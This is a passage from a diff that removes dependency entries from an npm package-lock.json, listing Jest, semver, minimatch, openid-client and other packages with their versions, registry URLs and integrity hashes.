"graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-28.1.3.tgz", - "integrity": "sha512-SZbOGBWEsaTxBGCOpsRWlXlvNkvTkY0XxRfh7zYmvd8uL5Qzyg0CHAXiXKROflh801quA6+/DsT4ODDthOC/OA==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/types": "^28.1.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^28.0.2", - "leven": "^3.1.0", - "pretty-format": "^28.1.3" - } - }, - "jest-watcher": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-28.1.3.tgz", - "integrity": "sha512-t4qcqj9hze+jviFPUN3YAtAEeFnr/azITXQEMARf5cMwKY2SMBRnCQTXLixTl20OR6mLh9KLMrgVJgJISym+1g==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/test-result": "^28.1.3", - "@jest/types": "^28.1.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.10.2", - "jest-util": "^28.1.3", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-28.1.3.tgz", - "integrity": "sha512-CqRA220YV/6jCo8VWvAt1KKx6eek1VIHMPeLEbpcfSfkEeWyBNppynM/o6q+Wmw+sOhos2ml34wZbSX3G13//g==", - "dev": true, - "requires": { - "@types/node": "*", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - } - }, - "pretty-format": { - "version": "28.1.3", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-28.1.3.tgz", - "integrity": "sha512-8gFb/To0OmxHR9+ZTb14Df2vNxdGCX8g1xWGUTqUw5TiZvcQf5sHKObd5UcPyLLyowNwDAMTF3XWOG1B6mxl1Q==", - "dev": true, - "optional": true, - "peer": true, - "requires": { - "@jest/schemas": "^28.1.3", - "ansi-regex": "^5.0.1", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - } - }, - "resolve.exports": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-1.1.1.tgz", - "integrity": "sha512-/NtpHNDN7jWhAaQ9BvBUYZ6YTXsRBgfqWFWP7BZBaoMJO/I3G5OFzvTuWNlZC3aPjins1F+TNrLKsGbH4rfsRQ==", - "dev": true, - "optional": true, - "peer": true - }, - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true, - "optional": true, - "peer": true - }, - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha512-UVU9dibq2JcFWxQPA6KCqj5O42VOmAY3zQUfEKxU0KpTGXwNoCjkX1e13eHNvw/xPynt6pU0rZ1htjWTNTSXsg==" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stable-stringify-without-jsonify": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/json-stable-stringify-without-jsonify/-/json-stable-stringify-without-jsonify-1.0.1.tgz", - "integrity": "sha512-Bdboy+l7tA3OGW6FjyFHWkP5LuByj1Tk33Ljyq0axyzdk9//JSi2u3fP1QSmd1KNwq6VOKYGlAu87CisVir6Pw==", - "dev": true, - "peer": true - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha512-ZClg6AaYvamvYEE82d3Iyd3vSSIjQ+odgjaTzRuO3s7toCdFKczob2i0zCh7JE8kWn17yvAWhUVxvqGwUalsRA==" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.2.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.2.0.tgz", - "integrity": "sha512-T9V+8iNYKFL2n2rF+w02LBOT2JjDnTjioaNFrxRy0Bv1y/hNsqR/EBK7Ojy2ythRHwmz2cRIls+9JitQGZC/sw==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "levn": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/levn/-/levn-0.4.1.tgz", - "integrity": "sha512-+bT2uH4E5LGE7h/n3evcS/sQlJXCpIp6ym8OWJ5eV6+67Dsql/LaaT7qJBAt2rzfoa/5QBGBhxDix1dMt2kQKQ==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1", - "type-check": "~0.4.0" - } - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", - "integrity": "sha512-iPZK6eYjbxRu3uB4/WZ3EsEIMJFMqAoopl3R+zuq0UjcAm/MO6KCweDgPfP3elTztoKP3KtnVHxTn2NHBSDVUw==", - "dev": true, - "peer": true, - "requires": { - "p-locate": "^5.0.0" - } - }, - "lodash.merge": { - "version": "4.6.2", - "resolved": "https://registry.npmjs.org/lodash.merge/-/lodash.merge-4.6.2.tgz", - "integrity": "sha512-0KpjqXRVvrYyCsX1swR/XTK0va6VQkQM6MNo7PqW77ByjAhoARA8EfrP1N4+KlKj8YS0ZUCtRT/YUuhyYDujIQ==", - "dev": true, - "peer": true - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.8.tgz", - "integrity": "sha512-PXwfBhYu0hBCPw8Dn0E+WDYb7af3dSLVWKi3HGv84IdF4TyFoC0ysxFd0Goxw7nSv4T/PzEJQxsYsEiFCKo2BA==", - "dev": true, - "requires": { - "braces": "^3.0.3", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - }, - "dependencies": { - "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", - "requires": { - "balanced-match": "^1.0.0" - } - }, - "glob": { - "version": "10.4.5", - "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", - "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", - "requires": { - "foreground-child": "^3.1.0", - "jackspeak": "^3.1.2", - "minimatch": "^9.0.4", - "minipass": "^7.1.2", - "package-json-from-dist": "^1.0.0", - "path-scurry": "^1.11.1" - } - }, - "minimatch": { - "version": "9.0.5", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", - "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", - "requires": { - "brace-expansion": "^2.0.1" - } - }, - "rimraf": { - "version": "5.0.10", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-5.0.10.tgz", - "integrity": "sha512-l0OE8wL34P4nJH/H2ffoaniAokM2qSmrtXHmlpvYr5AVVX8msAyW0l8NVJFDxlSK4u3Uh/f41cQheDVdnYijwQ==", - "requires": { - "glob": "^10.3.7" - } - } - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "optionator": { - "version": "0.9.3", - "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", - "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", - "dev": true, - "peer": true, - "requires": { - "@aashutoshrathi/word-wrap": "^1.2.3", - "deep-is": "^0.1.3", - "fast-levenshtein": "^2.0.6", - "levn": "^0.4.1", - "prelude-ls": "^1.2.1", - "type-check": "^0.4.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-5.0.0.tgz", - "integrity": "sha512-LaNjtRWUBY++zB5nE/NwcaoMylSPk+S+ZHNB1TzdbMJMny6dynpAGt7X/tl/QYq3TIeE6nxHppbo2LGymrG5Pw==", - "dev": true, - "peer": true, - "requires": { - "p-limit": "^3.0.2" - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "parent-module": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", - "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", - "dev": true, - "requires": { - "callsites": "^3.0.0" - } - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": 